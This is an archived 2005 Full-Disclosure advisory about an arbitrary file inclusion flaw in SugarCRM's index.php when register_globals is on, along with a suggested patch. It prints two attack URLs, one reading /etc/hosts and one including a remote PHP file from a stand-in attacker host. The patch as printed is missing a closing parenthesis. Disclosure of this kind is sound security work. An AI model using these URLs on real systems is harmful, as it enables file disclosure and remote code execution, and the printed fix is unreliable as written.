OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
[Full-Disclosure] Arbitrary file inclusion in SugarCRM [PHP]

From: Santiago Cortes (blindotgmail.com)
Date: Thu Jan 06 2005 - 15:46:41 CST


------------------------------------------------------------
Arbitrary File Inclusion in SugarCRM
------------------------------------------------------------
Author: Santiago CortÚs
Date: Jan 06, 2005
------------------------------------------------------------

Vulnerability:

Failure to sanitize user input in index.php opens the possibility for
an attacker to include an arbitrary file when PHP's "register_globals"
is on.

Example:

http://www.sugarsales.com/index.php?module=Home&moduleDefaultFile[Home]=/etc/hosts

http://www.sugarsales.com/index.php?module=Home&moduleDefaultFile[Home]=http://www.attackersite.com/malicious.php

Fix:
Disable register_globals in your php.ini file, or

Replace line 198 in index.php:
$currentModuleFile = $moduleDefaultFile[$currentModule];

With
if ( !isset($moduleDefaultFile[$currentModule] ) {
   die('No action specified');
}
$currentModuleFile = $moduleDefaultFile[$currentModule];

Disclaimer:

The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result
of using the information or demonstrations provided in any part of
this advisory.

Contact:
Santiago CortÚs
blindot --at-- gmail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html